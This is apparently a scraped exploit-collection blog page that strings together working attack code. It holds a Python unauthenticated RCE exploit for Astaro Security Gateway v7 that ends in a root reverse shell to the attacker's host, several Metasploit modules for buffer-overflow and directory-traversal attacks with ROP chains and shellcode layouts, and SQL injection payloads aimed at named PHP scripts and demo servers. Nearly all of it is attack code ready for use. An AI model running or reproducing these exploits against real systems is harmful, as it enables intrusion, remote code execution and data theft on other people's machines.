#!/usr/bin/python
# Astaro Security Gateway v7 - Unauthenticated Remote Code Execution
# Exploit Authors: Jakub Palaczynski and Maciej Grabiec
# Tested on versions: 7.500 and 7.506
# Date: 13.12.2016
# Vendor Homepage: https://www.sophos.com/
# CVE: CVE-2017-6315
import socket
import sys
import os
import threading
import subprocess
import time
# print help or assign arguments
if len(sys.argv) != 3:
sys.stderr.write("[-]Usage: python %s <our_ip> <remote_ip:port>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0])
sys.exit(1)
lhost = sys.argv[1] # our ip address
rhost = sys.argv[2] # ip address and port of vulnerable ASG v7
# for additional thread to send requests in parallel
class requests (threading.Thread):
def run(self):
print 'Sending requests to trigger vulnerability.'
time.sleep(5)
# first request to clear cache
os.system('curl -s -m 5 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':81"}\' -k > /dev/null')
# second request to trigger reverse connection
os.system('curl -s -m 20 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':80"}\' -k > /dev/null')
# function that creates socket
def create_socket(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
sock.listen(10)
conn, addr = sock.accept()
return sock, conn, addr
# function to receive data from socket
def receive(conn):
sys.stdout.write(conn.recv(1024))
sys.stdout.flush()
sys.stdout.write(conn.recv(1024))
sys.stdout.flush()
# Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl
# This script creates serialized object that makes reverse connection and executes everything what it receives on a socket
file = """
#!/usr/bin/perl
use strict;
use MIME::Base64 qw( encode_base64 );
use Storable qw( nfreeze );
use LWP::UserAgent;
my $package_name = "A" x 252;
my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~;
eval($pack);
my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~;
my $padding = length($package_name) - length($payload);
$payload = $payload . (";" x $padding);
my $data = bless { ignore => 'this' }, $package_name;
my $frozen = nfreeze($data);
$frozen =~ s/$package_name/$payload/g;
my $encodedSize = length($frozen);
my $pakiet = print(pack("N", $encodedSize), $frozen);
print "$frozen";
"""
# save file, run perl script and save our serialized payload
f = open("payload.pl", "w")
f.write(file)
f.close()
serialized = os.popen("perl ./payload.pl").read()
os.remove("./payload.pl")
# start thread that sends requests
thread = requests()
thread.start()
# open socket that receives connection from index
sock, conn, addr = create_socket(80)
print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.'
print 'Sending 1st stage payload.'
data = conn.recv(256)
# say hello to RPC client
conn.sendall(data)
data = conn.recv(256)
# send serialized object that initiates connect back connection and executes everything what it receives on a socket
conn.sendall(serialized)
sock.close()
# create second socket that receives connection from index and sends additional commands
sock, conn, addr = create_socket(443)
print 'Sending 2nd stage payload.'
# send commands that exploit confd (running with root permissions) which is running on localhost - the same exploitation as for first stage
conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n')
sock.close()
# create socket that receives connection from confd and sends commands to get reverse shell
sock, conn, addr = create_socket(443)
print 'Sending 3rd stage payload.'
# send reverse shell payload
conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n')
sock.close()
# create socket to receive shell with root permissions
print '\nNow you need to wait for shell.'
sock, conn, addr = create_socket(443)
receive(conn)
while True:
cmd = raw_input("")
if cmd == 'exit':
break
else:
conn.send(cmd + "\n")
receive(conn)
sock.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863582430
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Cloudview NMS server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
['URL', '0day']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ ' Cloudview NMS 2.00b on Windows', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 13 2014",
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
], self.class)
end
def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)
ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
select(nil, nil, nil, 1)
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada AlarmServer Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
KingScada < 3.1.2.13. The vulnerability is triggered when
sending a specially crafted packet to the 'AlarmServer'
(AEserver.exe) service listening on port 12401. During the
parsing of the packet the 3rd dword is used as a size value
for a memcpy operation which leads to an overflown stack buffer
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-0787' ],
[ 'ZDI', '14-071' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4',
{
# dbghelp.dll
# pop esi/ pop edi/ retn
'ret' => 0x02881fbf,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10, 2014'))
register_options([Opt::RPORT(12401)], self.class)
end
def exploit
connect
p = payload.encoded
buf = make_nops(5000)
buf[0, 4] = [0x000004d2].pack('V')
buf[4, 4] = [0x0000007b].pack('V')
buf[8, 4] = [0x0000133c].pack('V') # size for memcpy()
buf[1128, p.length] = p
buf[2128, 8] = generate_seh_record(target['ret'])
buf[2136, 5] = "\xe9\x4b\xfb\xff\xff" # jmp $-1200
print_status("Trying target #{target.name}...")
sock.put(buf)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'haneWIN DNS Server Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in
haneWIN DNS Server <= 1.5.3. The vulnerability is triggered
by sending an overly long packet to the victim server. A memcpy
function blindly copies user supplied data to a fixed size buffer
leading to remote code execution.
This module was tested against haneWIN DNS 1.5.3
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31260' ],
[ 'OSVDB', '102773' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x20",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows 2000 SP4 EN / haneWIN DNS 1.5.3',
{
# msvcrt.dll v6.10.9844.0
# pop esi/ pop edi/ retn
'Ret' => 0x78010394,
}
]
],
'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(53)], self.class)
end
def exploit
connect
p = make_nops(32) + payload.encoded
buf = Rex::Text.pattern_create(5000)
buf[0, 2] = [0x4e20].pack('n') # length for malloc
buf[1332, p.length] = p
buf[2324, 8] = generate_seh_record(target.ret)
buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff" # jmp $-1000
print_status("Sending malicious request...")
sock.put(buf)
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found
in libpal.dll of Disk Pulse Server v2.2.34. The overflow
is triggered when sending an overly long 'GetServerInfo'
request to the service listening on port 9120.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '43919' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ],
[ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => 'True',
'StackAdjustment' => -3500,
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# p/p/r
# libspp.dll
'Ret' => 0x1006f71f,
'Offset' => 303
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 19 2010'))
register_options([Opt::RPORT(9120)], self.class)
end
def exploit
connect
sploit = "GetServerInfo"
sploit << "\x41" * 8
sploit << payload.encoded
sploit << "\x42" * (303 - (8 + payload.encoded.length))
sploit << generate_seh_record(target.ret)
sploit << make_nops(4)
sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311
sploit << rand_text_alpha_upper(200)
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
end
__END__
0033C05C 55 PUSH EBP
0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C]
0033C061 3AC2 CMP AL,DL
0033C063 74 14 JE SHORT libpal.0033C079
0033C065 3C 0D CMP AL,0D
0033C067 74 10 JE SHORT libpal.0033C079
0033C069 3C 0A CMP AL,0A
0033C06B 74 0C JE SHORT libpal.0033C079
0033C06D 41 INC ECX
0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL
0033C071 47 INC EDI
0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]
0033C075 84C0 TEST AL,AL
0033C077 ^75 E8 JNZ SHORT libpal.0033C061
0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0
0033C07D 5D POP EBP
0033C07E 5F POP EDI
0033C07F 890B MOV DWORD PTR DS:[EBX],ECX
0033C081 5E POP ESI
0033C082 B8 01000000 MOV EAX,1
0033C087 5B POP EBX
0033C088 C3 RETN
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Lockstep Backup for Workgroups <= 4.0.3',
'Description' => %q{
This module exploits a stack buffer overflow found in
Lockstep Backup for Workgroups <= 4.0.3. The vulnerability
is triggered when sending a specially crafted packet that
will cause a login failure.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://secunia.com/advisories/50260/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 ALL EN',
{
# msvcrt.dll
# pop ecx/ pop ecx/ retn
'Ret' => 0x780146c0,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 11 2013'))
register_options(
[
Opt::RPORT(2125),
OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])
], self.class )
end
def exploit
connect
uname = datastore['USERNAME']
p = "\x90" * 16
p << payload.encoded
packet = rand_text_alpha_upper(10000)
packet[0, 8] = "BFWCA\x01\x01\x00"
packet[8, uname.length] = "#{uname}\x00"
packet[73, p.length] = p
packet[7197, 4] = "\xeb\x06\x90\x90" # jmp $+8
packet[7201, 4] = [target.ret].pack('V')
packet[7205, 8] = "\x90" * 8
packet[7213, 2] = "\xff\xe7" # jmp edi
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x72',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability
found in EMC Alphastor Device Manager. The overflow is triggered
when sending a specially crafted packet to the rrobotd.exe service
listening on port 3000. During the copying of strings to the stack
an unbounded sprintf() function overwrites the return pointer
leading to remote code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', '0day' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'ConnectionType' => '+ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# pop eax/ retn
# msvcrt.dll
'Ret' => 0x77bc5d88,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 14 2013'))
register_options(
[
Opt::RPORT(3000)
], self.class )
end
def exploit
connect
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = "\xcc" * 550
buf[246, 4] = [target.ret].pack('V')
buf[250, 4] = [0x77bf6f80].pack('V')
buf[254, rop.length] = rop
buf[350, payload.encoded.length] = payload.encoded
packet = "\x72#{buf}"
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Library Manager Opcode 0x4f',
'Description' => %q{
This module exploits a stack based buffer overflow found in EMC
Alphastor Library Manager version < 4.0 build 910. The overflow
is triggered due to a lack of sanitization of the pointers used
for two strcpy functions.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ],
[ 'CVE', '2013-0946' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'wfsdelay' => 1000
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# msvcrt.dll
# add esp, 0c/ retn
'Ret' => 0x77bdda70,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 13 2014'))
register_options(
[
Opt::RPORT(3500)
], self.class )
end
def exploit
connect
p = "\x90" * 8
p << payload.encoded
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = Rex::Text.pattern_create(514)
buf[0, 2] = "O~" # opcode
buf[13, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[25, 4] = [target.ret].pack('V') # stack pivot 12
buf[41, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[57, 4] = [0x01167e20].pack('V') # ptr
buf[69, rop.length] = rop
buf[165, 4] = [0x909073eb].pack('V') # jmp $+117
buf[278, 4] = [0x0116fd59].pack('V') # ptr
buf[282, p.length] = p
buf[512, 1] = "\x00"
# junk
buf << "AAAA"
buf << "BBBB"
buf << "CCCC"
buf << "DDDD"
print_status("Trying target %s..." % target.name)
sock.put(buf)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Mplayer SAMI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
SMPlayer 0.6.9 (Permanent DEP /AlwaysON). The overflow is
triggered during the parsing of an overly long string found
in a malicious SAMI subtitle file.
},
'License' => MSF_LICENSE,
'Author' => [ 'James Fitts' ],
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '49149' ],
[ 'OSVDB', '74604' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/mplayer_sami_subtitle_file_overflow' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/assets/149/mwri_mplayer-sami-subtitles_2011-08-12.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d\x3c\x7b",
'StackAdjustment' => -3500,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'DisableNops' => 'True',
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 EN',
{
# pushad/ retn
# msvcrt.dll
'Ret' => 0x77c12df9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 14 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msfmsfa.smi']),
], self.class)
end
def make_nops(cnt)
return "\x41" * cnt
end
def exploit
# Chain 2 => kernel32!virtualalloc
# msvcrt.dll
gadgets = [
0x77c23e7a, # XOR EAX, EAX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c2c84b, # MOV EBX, ECX/ MOV ECX, EAX/ MOV EAX, ESI/ POP ESI/ RETN 10
0x41414141,
0x77c127e5, # INC EBX/ RETN
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41413141,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c58fbc, # XCHG EAX, EDX/ RETN
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41414101,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c39dd3, # POP EDI/ POP ESI/ RETN
0x77c39dd5, # ROP NOP
0x77c168cd, # JMP EAX
0x77c21d16, # POP EAX/ RETN
0x7c809af1, # kernel32!virtualalloc
0x77c12df9, # PUSHAD/ RETN
0x77c35524, # PUSH ESP/ RETN
].flatten.pack("V*")
p = make_nops(16) + payload.encoded
boom = pattern_create(979)
boom << [target.ret].pack('V')
boom[83, gadgets.length] = gadgets
boom[203, p.length] = p
# Chain 1 => Stack Pivot
boom[963, 4] = [0x41414101].pack('V') # Size
boom[967, 4] = [0x77c58fbc].pack('V') # XCHG EAX, EDX/ RETN => exec 2
boom[971, 4] = [0x77c59f6b].pack('V') # ADD DH, BL/ RETN => exec 1
boom[975, 4] = [0x77c15ed5].pack('V') # XCHG EAX, ESP/ RETN => exec 3
smi = %Q|<SAMI>
<BODY>
<SYNC Start=0>
#{rand_text_alpha_upper(40)}
#{boom}
</SAMI>|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(smi)
end
end
__END__
# # # # #
# Exploit Title: Justdial Clone Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/z1mt4303451/php-scripts/justdial-clone-script
# Demo: http://74.124.215.220/~jusdil/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/restaurants-details.php?fid=[SQL]
#
# 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Theater Management Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/8o2b4417538/php-scripts/theater-management-script
# Demo: http://198.38.86.159/~dineshkumarwork/demo/movie/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/show-time.php?moid=[SQL]
#
# -100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--+-
#
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
#
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: PTC KSV1 Script 1.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/ptc-ksv1.php
# Demo: http://www.ksv1demo.gvmhosting.com/
# Version: 1.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/gpt.php?v=entry&type=[SQL]&id=1&
#
# +'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1&
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Adserver Script 5.6 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/adserverscript.php
# Demo: http://adserverscript.gvmhosting.com/
# Version: 5.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an advertiser to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0
#
# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/payment-processor-script.php
# Demo: http://www.enterprise-edition.gvmhosting.com/
# Version: 3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login
#
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# http://localhost/[PATH]/products?id=[SQL]&action=update
#
# -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
#
